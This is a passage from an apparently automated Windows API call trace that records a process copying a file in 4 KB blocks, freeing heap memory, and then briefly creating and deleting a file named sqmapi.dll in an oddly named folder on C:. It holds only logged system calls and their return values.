lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.438] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.438] GetLastError () returned 0x0 [0081.438] SetLastError (dwErrCode=0x0) [0081.438] GetLastError () returned 0x0 [0081.438] SetLastError (dwErrCode=0x0) [0081.438] GetLastError () returned 0x0 [0081.438] SetLastError (dwErrCode=0x0) [0081.438] GetLastError () returned 0x0 [0081.438] SetLastError (dwErrCode=0x0) [0081.438] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.438] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.439] GetLastError () returned 0x0 [0081.439] SetLastError (dwErrCode=0x0) [0081.439] GetLastError () returned 0x0 [0081.439] SetLastError (dwErrCode=0x0) [0081.439] GetLastError () returned 0x0 [0081.439] SetLastError (dwErrCode=0x0) [0081.439] GetLastError () returned 0x0 [0081.439] SetLastError (dwErrCode=0x0) [0081.439] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.439] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.440] GetLastError () returned 0x0 [0081.440] SetLastError (dwErrCode=0x0) [0081.440] GetLastError () returned 0x0 [0081.440] SetLastError (dwErrCode=0x0) [0081.440] GetLastError () returned 0x0 [0081.440] SetLastError (dwErrCode=0x0) [0081.440] GetLastError () returned 0x0 [0081.440] SetLastError (dwErrCode=0x0) [0081.440] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.440] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.440] GetLastError () returned 0x0 [0081.440] SetLastError (dwErrCode=0x0) [0081.441] GetLastError () returned 0x0 [0081.441] SetLastError (dwErrCode=0x0) [0081.441] GetLastError () returned 0x0 [0081.441] SetLastError (dwErrCode=0x0) [0081.441] GetLastError () returned 0x0 [0081.441] SetLastError (dwErrCode=0x0) [0081.441] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.441] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.441] GetLastError () returned 0x0 [0081.441] SetLastError (dwErrCode=0x0) [0081.441] GetLastError () returned 0x0 [0081.442] SetLastError (dwErrCode=0x0) [0081.442] GetLastError () returned 0x0 [0081.442] SetLastError (dwErrCode=0x0) [0081.442] GetLastError () returned 0x0 [0081.442] SetLastError (dwErrCode=0x0) [0081.442] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.442] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.442] GetLastError () returned 0x0 [0081.442] SetLastError (dwErrCode=0x0) [0081.442] GetLastError () returned 0x0 [0081.442] SetLastError (dwErrCode=0x0) [0081.443] GetLastError () returned 0x0 [0081.443] SetLastError (dwErrCode=0x0) [0081.443] GetLastError () returned 0x0 [0081.443] SetLastError (dwErrCode=0x0) [0081.443] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.443] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.443] GetLastError () returned 0x0 [0081.443] SetLastError (dwErrCode=0x0) [0081.443] GetLastError () returned 0x0 [0081.443] SetLastError (dwErrCode=0x0) [0081.444] GetLastError () returned 0x0 [0081.444] SetLastError (dwErrCode=0x0) [0081.444] GetLastError () returned 0x0 [0081.444] SetLastError (dwErrCode=0x0) [0081.444] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.444] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.444] GetLastError () returned 0x0 [0081.444] SetLastError (dwErrCode=0x0) [0081.444] GetLastError () returned 0x0 [0081.444] SetLastError (dwErrCode=0x0) [0081.444] GetLastError () returned 0x0 [0081.444] SetLastError (dwErrCode=0x0) [0081.445] GetLastError () returned 0x0 [0081.445] SetLastError (dwErrCode=0x0) [0081.445] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.445] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.445] GetLastError () returned 0x0 [0081.445] SetLastError (dwErrCode=0x0) [0081.445] GetLastError () returned 0x0 [0081.445] SetLastError (dwErrCode=0x0) [0081.445] GetLastError () returned 0x0 [0081.445] SetLastError (dwErrCode=0x0) [0081.445] GetLastError () returned 0x0 [0081.445] SetLastError (dwErrCode=0x0) [0081.446] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.446] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.446] GetLastError () returned 0x0 [0081.446] SetLastError (dwErrCode=0x0) [0081.446] GetLastError () returned 0x0 [0081.446] SetLastError (dwErrCode=0x0) [0081.446] GetLastError () returned 0x0 [0081.446] SetLastError (dwErrCode=0x0) [0081.446] GetLastError () returned 0x0 [0081.446] SetLastError (dwErrCode=0x0) [0081.446] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.447] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.447] GetLastError () returned 0x0 [0081.447] SetLastError (dwErrCode=0x0) [0081.447] GetLastError () returned 0x0 [0081.447] SetLastError (dwErrCode=0x0) [0081.447] GetLastError () returned 0x0 [0081.447] SetLastError (dwErrCode=0x0) [0081.447] GetLastError () returned 0x0 [0081.447] SetLastError (dwErrCode=0x0) [0081.447] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.447] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.448] GetLastError () returned 0x0 [0081.448] SetLastError (dwErrCode=0x0) [0081.448] GetLastError () returned 0x0 [0081.448] SetLastError (dwErrCode=0x0) [0081.448] GetLastError () returned 0x0 [0081.448] SetLastError (dwErrCode=0x0) [0081.448] GetLastError () returned 0x0 [0081.448] SetLastError (dwErrCode=0x0) [0081.448] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.448] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.448] GetLastError () returned 0x0 [0081.449] SetLastError (dwErrCode=0x0) [0081.449] GetLastError () returned 0x0 [0081.449] SetLastError (dwErrCode=0x0) [0081.449] GetLastError () returned 0x0 [0081.449] SetLastError (dwErrCode=0x0) [0081.449] GetLastError () returned 0x0 [0081.449] SetLastError (dwErrCode=0x0) [0081.449] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.449] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.449] GetLastError () returned 0x0 [0081.449] SetLastError (dwErrCode=0x0) [0081.449] GetLastError () returned 0x0 [0081.450] SetLastError (dwErrCode=0x0) [0081.450] GetLastError () returned 0x0 [0081.450] SetLastError (dwErrCode=0x0) [0081.450] GetLastError () returned 0x0 [0081.450] SetLastError (dwErrCode=0x0) [0081.450] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.450] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.450] GetLastError () returned 0x0 [0081.450] SetLastError (dwErrCode=0x0) [0081.450] GetLastError () returned 0x0 [0081.450] SetLastError (dwErrCode=0x0) [0081.451] GetLastError () returned 0x0 [0081.451] SetLastError (dwErrCode=0x0) [0081.451] GetLastError () returned 0x0 [0081.451] SetLastError (dwErrCode=0x0) [0081.451] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.451] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.451] GetLastError () returned 0x0 [0081.451] SetLastError (dwErrCode=0x0) [0081.451] GetLastError () returned 0x0 [0081.451] SetLastError (dwErrCode=0x0) [0081.451] GetLastError () returned 0x0 [0081.451] SetLastError (dwErrCode=0x0) [0081.451] SetLastError (dwErrCode=0x0) [0081.452] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.652] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.654] SetLastError (dwErrCode=0x0) [0081.654] SetLastError (dwErrCode=0x0) [0081.654] SetLastError (dwErrCode=0x0) [0081.654] SetLastError (dwErrCode=0x0) [0081.654] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.654] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.660] SetLastError (dwErrCode=0x0) [0081.660] SetLastError (dwErrCode=0x0) [0081.660] SetLastError (dwErrCode=0x0) [0081.660] SetLastError (dwErrCode=0x0) [0081.660] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.664] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.664] SetLastError (dwErrCode=0x0) [0081.667] SetLastError (dwErrCode=0x0) [0081.667] SetLastError (dwErrCode=0x0) [0081.667] SetLastError (dwErrCode=0x0) [0081.667] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.668] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.669] SetLastError (dwErrCode=0x0) [0081.669] SetLastError (dwErrCode=0x0) [0081.686] GetLastError () returned 0x0 [0081.686] SetLastError (dwErrCode=0x0) [0081.686] GetLastError () returned 0x0 [0081.686] SetLastError (dwErrCode=0x0) [0081.686] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.686] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.687] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] GetLastError () returned 0x0 [0081.687] SetLastError (dwErrCode=0x0) [0081.687] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.687] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.688] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] GetLastError () returned 0x0 [0081.688] SetLastError (dwErrCode=0x0) [0081.688] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.689] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.689] GetLastError () returned 0x0 [0081.689] SetLastError (dwErrCode=0x0) [0081.689] GetLastError () returned 0x0 [0081.689] SetLastError (dwErrCode=0x0) [0081.689] GetLastError () returned 0x0 [0081.689] SetLastError (dwErrCode=0x0) [0081.689] GetLastError () returned 0x0 [0081.689] SetLastError (dwErrCode=0x0) [0081.689] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.689] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.689] GetLastError () returned 0x0 [0081.689] SetLastError (dwErrCode=0x0) [0081.689] GetLastError () returned 0x0 [0081.689] SetLastError (dwErrCode=0x0) [0081.689] GetLastError () returned 0x0 [0081.690] SetLastError (dwErrCode=0x0) [0081.690] GetLastError () returned 0x0 [0081.690] SetLastError (dwErrCode=0x0) [0081.690] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x420, lpOverlapped=0x0) returned 1 [0081.690] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.690] GetLastError () returned 0x0 [0081.690] SetLastError (dwErrCode=0x0) [0081.690] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0081.690] GetLastError () returned 0x0 [0081.690] SetLastError (dwErrCode=0x0) [0081.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0081.690] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x420, lpOverlapped=0x0) returned 1 [0081.690] GetLastError () returned 0x0 [0081.690] SetLastError (dwErrCode=0x0) [0081.691] GetLastError () returned 0x0 [0081.691] SetLastError (dwErrCode=0x0) [0081.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0081.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0081.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0081.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0081.691] CloseHandle (hObject=0x42c) returned 1 [0081.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.694] CloseHandle (hObject=0x428) returned 1 [0081.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0081.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0081.695] AreFileApisANSI () returned 1 [0081.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69300 [0081.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0081.695] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.696] GetFileType (hFile=0x428) returned 0x1 [0081.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0081.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.697] GetLastError () returned 0xb7 [0081.697] SetLastError (dwErrCode=0xb7) [0081.697] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0081.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.698] CloseHandle (hObject=0x428) returned 1 [0081.698] AreFileApisANSI () returned 1 [0081.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69170 [0081.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0081.698] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0081.699] HeapFree (in: hHeap=0x20000, 